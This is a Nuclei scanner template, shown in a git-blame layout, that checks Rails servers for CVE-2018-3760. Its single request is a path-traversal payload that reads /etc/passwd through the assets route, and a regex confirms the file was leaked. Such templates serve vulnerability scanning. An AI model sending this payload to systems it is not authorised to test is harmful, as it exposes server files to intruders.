2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-3760
|
2020-04-05 18:01:09 +00:00
|
|
|
|
|
|
|
info:
|
2021-01-02 05:00:39 +00:00
|
|
|
name: Rails CVE-2018-3760
|
2020-04-05 18:01:09 +00:00
|
|
|
author: 0xrudra
|
|
|
|
severity: high
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-05 18:01:09 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-05 18:01:09 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2020-05-25 07:49:06 +00:00
|
|
|
- "root:[x*]:0:0:"
|
2020-04-05 18:01:09 +00:00
|
|
|
part: body
|